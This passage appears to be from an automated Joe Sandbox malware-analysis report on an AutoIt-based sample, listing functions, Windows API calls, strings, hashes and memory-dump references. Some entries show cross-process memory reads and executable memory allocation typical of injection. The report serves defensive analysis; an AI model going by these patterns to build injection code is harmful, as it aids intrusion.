                                                                        • Part of subcall function 00571487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005692C5,?,?,00000800,?,00001073,00000000,?,?), ref: 005714B1
                                                                        • Part of subcall function 005713DE: GetWindowThreadProcessId.USER32(?,?), ref: 00571409
                                                                        • Part of subcall function 005713DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0056925A,00000034,?,?,00001004,00000000,00000000), ref: 00571419
                                                                        • Part of subcall function 005713DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0056925A,00000034,?,?,00001004,00000000,00000000), ref: 0057142F
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005698AC
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005698F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: e4747215611fbfa4801730353e1d533b5f67c6de00b5b2ca8aa497ca9156acbe
                                                                      • Instruction ID: 4704bc0588d8a8a4d04d0f0444f3df99e47854e833639891b0d810ebce63e32f
                                                                      • Opcode Fuzzy Hash: e4747215611fbfa4801730353e1d533b5f67c6de00b5b2ca8aa497ca9156acbe
                                                                      • Instruction Fuzzy Hash: 47416076900219AFCF20DFA4DD45ADEBBB8FB45300F004159FA45B7181DA716E45DBA0
                                                                      Function 00597946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0059F910,00000000,?,?,?,?), ref: 005979DF
                                                                      • GetWindowLongW.USER32 ref: 005979FC
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00597A0C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: e260bd272ba90578ccf462569718aa0a546675d2022bd38be7c33a0b52ed2fdd
                                                                      • Instruction ID: ba6a6223cfaf617f78dc4a74a09f3912a26e95649249b3c2ec03a577b27c0444
                                                                      • Opcode Fuzzy Hash: e260bd272ba90578ccf462569718aa0a546675d2022bd38be7c33a0b52ed2fdd
                                                                      • Instruction Fuzzy Hash: C2318B3121460AABEF118E38DC45BEA7BA9FB49324F244726F875E22E0D731E9519B50
                                                                      Function 005973D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00597461
                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00597475
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00597499
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window
                                                                      • String ID: SysMonthCal32
                                                                      • API String ID: 2326795674-1439706946
                                                                      • Opcode ID: f122851bfe09c237bab6274e90fee95f4282485f777adaea1c9d62d8e38b1419
                                                                      • Instruction ID: 75d40666cffe7914d4a3b267c603ffb01416f7211ca42accc7362bd87a9e8c99
                                                                      • Opcode Fuzzy Hash: f122851bfe09c237bab6274e90fee95f4282485f777adaea1c9d62d8e38b1419
                                                                      • Instruction Fuzzy Hash: 3A21E132110219ABDF118E94DC46FEA3F69FB4C724F110115FE186B1D1DAB5AC50DBA0
                                                                      Function 00597B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00597C4A
                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00597C58
                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00597C5F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DestroyWindow
                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 4014797782-2298589950
                                                                      • Opcode ID: 34b40df7344b0ed5353c2ee24ea84b053a9422e99b7127e3b93482a4791491f6
                                                                      • Instruction ID: e1ec7dcb22be8cf4eaedb7e05406ba81941af5ed8a86342c36a702d20fedb22d
                                                                      • Opcode Fuzzy Hash: 34b40df7344b0ed5353c2ee24ea84b053a9422e99b7127e3b93482a4791491f6
                                                                      • Instruction Fuzzy Hash: 30218EB1614209AFEB10DF28DCC5DA63BEDFF5A394B54045AFA019B3A1DB31EC119B60
                                                                      Function 00596CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00596D3B
                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00596D4B
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00596D70
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$MoveWindow
                                                                      • String ID: Listbox
                                                                      • API String ID: 3315199576-2633736733
                                                                      • Opcode ID: dd34c40ccc4f8cea90db04146fb76ff13578a5ff2bc59b1f136bb87330228c7b
                                                                      • Instruction ID: 2596f720f4735d94e5e58175e8dd6752da39e2455ca856aa6030edf4da94f1a1
                                                                      • Opcode Fuzzy Hash: dd34c40ccc4f8cea90db04146fb76ff13578a5ff2bc59b1f136bb87330228c7b
                                                                      • Instruction Fuzzy Hash: 6B21C232600218BFEF118F54DC45FAB3BBAFF89750F018129F9549B1A0C6719C5597A0
                                                                      Function 005839E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __snwprintf.LIBCMT ref: 00583A66
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __snwprintf_memmove
                                                                      • String ID: , $$AUTOITCALLVARIABLE%d$%Z
                                                                      • API String ID: 3506404897-1529431106
                                                                      • Opcode ID: 78a7636e9097af940b61afe803d2c04bd034aa507bd43427b59e1eca72b52ac5
                                                                      • Instruction ID: 04a8db3839bb159c2cd25a1a04b021471066fadad4e2bc092758aa677b71ea52
                                                                      • Opcode Fuzzy Hash: 78a7636e9097af940b61afe803d2c04bd034aa507bd43427b59e1eca72b52ac5
                                                                      • Instruction Fuzzy Hash: 6C21523160011AAECF14EFA4CC85EEE7FB5BF88700F544459E955A7141DB34EA45CBA1
                                                                      Function 0059770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00597772
                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00597787
                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00597794
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 3850602802-1010561917
                                                                      • Opcode ID: a1322a61d3729729657cd188298f3b5db604c887f0ca63b709a8a1ddd900efb9
                                                                      • Instruction ID: 383ae0d29ab93ce925524734b50eba1cdeefdeeff1f9b91dfb27f5daf8b1bdfe
                                                                      • Opcode Fuzzy Hash: a1322a61d3729729657cd188298f3b5db604c887f0ca63b709a8a1ddd900efb9
                                                                      • Instruction Fuzzy Hash: BC113A72214209BFEF245FA0CC05FE73B68FF8CB54F110119F64192090D271E811DB10
                                                                      Function 00536B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __calloc_crt
                                                                      • String ID: \$@B]
                                                                      • API String ID: 3494438863-1004341647
                                                                      • Opcode ID: a658caff3b3bc389c817cd5874b6c756e9f6d8ee29e6c902db551db748f92bbc
                                                                      • Instruction ID: cff2062f4c8069cd433280833e2d65a2ca1113495ac73d3974113a1d2eb5c60e
                                                                      • Opcode Fuzzy Hash: a658caff3b3bc389c817cd5874b6c756e9f6d8ee29e6c902db551db748f92bbc
                                                                      • Instruction Fuzzy Hash: 4AF04475205612ABE7758F54BC66B626FD5F760770F50441FE100DE190FB7098495AC4
                                                                      Function 00539B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __lock.LIBCMT ref: 00539B94
                                                                        • Part of subcall function 00539C0B: __mtinitlocknum.LIBCMT ref: 00539C1D
                                                                        • Part of subcall function 00539C0B: EnterCriticalSection.KERNEL32(00000000,?,00539A7C,0000000D), ref: 00539C36
                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00539BA4
                                                                        • Part of subcall function 00539100: ___addlocaleref.LIBCMT ref: 0053911C
                                                                        • Part of subcall function 00539100: ___removelocaleref.LIBCMT ref: 00539127
                                                                        • Part of subcall function 00539100: ___freetlocinfo.LIBCMT ref: 0053913B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                      • String ID: 8\$8\
                                                                      • API String ID: 547918592-2136511422
                                                                      • Opcode ID: 37c557f391aae77036ca0de2e9957841e0701210738cd79703e5d12703cac704
                                                                      • Instruction ID: 02b5133d1d1f922257f725012c5852dfbd2f3839b30bcfd64d9dbfc9b6638d3c
                                                                      • Opcode Fuzzy Hash: 37c557f391aae77036ca0de2e9957841e0701210738cd79703e5d12703cac704
                                                                      • Instruction Fuzzy Hash: 4AE08CB2947706AEEA14FBE4690BF28AF90BB80B29F20215EF045661C1CEB40C00CA57
                                                                      Function 00514C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00514BD0,?,00514DEF,?,005D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00514C11
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00514C23
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-3689287502
                                                                      • Opcode ID: 2d01fd24c5cd890299f34f6bd4115020d0a43ea2f574b03f976659def3e1e036
                                                                      • Instruction ID: a925a611a439bdc8fd07406c2dd48b1c286acac2d76e96e40b0f80dee3905cee
                                                                      • Opcode Fuzzy Hash: 2d01fd24c5cd890299f34f6bd4115020d0a43ea2f574b03f976659def3e1e036
                                                                      • Instruction Fuzzy Hash: 6CD01230511713CFD7205FB1D908A46BED5FF19355B118C3E9485D6160E6B0D8C0DB90
                                                                      Function 00514C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00514B83,?), ref: 00514C44
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00514C56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-1355242751
                                                                      • Opcode ID: a31d90bde56b738bf20a6dac4cf8b83feb5e62395602027acd369c6de8dce5ae
                                                                      • Instruction ID: 0b499166ca057132b72608373f9f3e6f7bf19a3b6fecdd72bc780d3f132d6a72
                                                                      • Opcode Fuzzy Hash: a31d90bde56b738bf20a6dac4cf8b83feb5e62395602027acd369c6de8dce5ae
                                                                      • Instruction Fuzzy Hash: FDD01730610713CFEB209F71D91864A7BE5BF15355B22883E9496DA160E770D8C0DBA0
                                                                      Function 00590DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00591039), ref: 00590DF5
                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00590E07
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2574300362-4033151799
                                                                      • Opcode ID: 50c1736a9b697cb412a36de67a3fe08d3e05c33352ee6d4623d495448b9263f7
                                                                      • Instruction ID: 9f647a9bb4e2d54ac79dc738be110d9c4cd839ea68090b648a156e82ab794538
                                                                      • Opcode Fuzzy Hash: 50c1736a9b697cb412a36de67a3fe08d3e05c33352ee6d4623d495448b9263f7
                                                                      • Instruction Fuzzy Hash: B6D01770510722CFDB209FB5D908B867AE9BF15352F129C7E9486D61A0EAB0D890DB90
                                                                      Function 005890E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00588CF4,?,0059F910), ref: 005890EE
                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00589100
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                      • API String ID: 2574300362-199464113
                                                                      • Opcode ID: 9390c73698705900c93db7ee9fc8a508a50386dd905c3918ca8f647620b1b197
                                                                      • Instruction ID: a863bf9e85c1998ce202afb68ad606ef4a5beb9b37052a179cf25a4e84bbe99e
                                                                      • Opcode Fuzzy Hash: 9390c73698705900c93db7ee9fc8a508a50386dd905c3918ca8f647620b1b197
                                                                      • Instruction Fuzzy Hash: D7D01734614723CFDB20AF71D81C6167AE5BF15351B16883E9886E65A0EB74C880DBA0
                                                                      Function 00551714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: LocalTime__swprintf
                                                                      • String ID: %.3d$WIN_XPe
                                                                      • API String ID: 2070861257-2409531811
                                                                      • Opcode ID: 3d12bfd26e948f5de41f8dc0e14027db9df9ded1bb1e06080c781dd1ddb49f43
                                                                      • Instruction ID: 302cf8c614a4e64d67159b45b45b5da14124e89c6c96c7f781971666074d1966
                                                                      • Opcode Fuzzy Hash: 3d12bfd26e948f5de41f8dc0e14027db9df9ded1bb1e06080c781dd1ddb49f43
                                                                      • Instruction Fuzzy Hash: C4D01271854509FACB0097949C99EF97F7CF71C302F141853B806D2040E2219B98E625
                                                                      Function 0056717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3a4c15cee9f04fe76346e12e3dc5269c30224c163e1d17954017e7b20e24a5b1
                                                                      • Instruction ID: 03840de7b15387617d623118f1b3c24f0bf8b83ce49522bce44d60f14f4cc54c
                                                                      • Opcode Fuzzy Hash: 3a4c15cee9f04fe76346e12e3dc5269c30224c163e1d17954017e7b20e24a5b1
                                                                      • Instruction Fuzzy Hash: D2C16174A0421AEFCB14CFA4C884EAEBBB5FF48718B158999E805DB351DB30DD81DB90
                                                                      Function 0058E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?), ref: 0058E0BE
                                                                      • CharLowerBuffW.USER32(?,?), ref: 0058E101
                                                                        • Part of subcall function 0058D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0058D7C5
                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0058E301
                                                                      • _memmove.LIBCMT ref: 0058E314
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
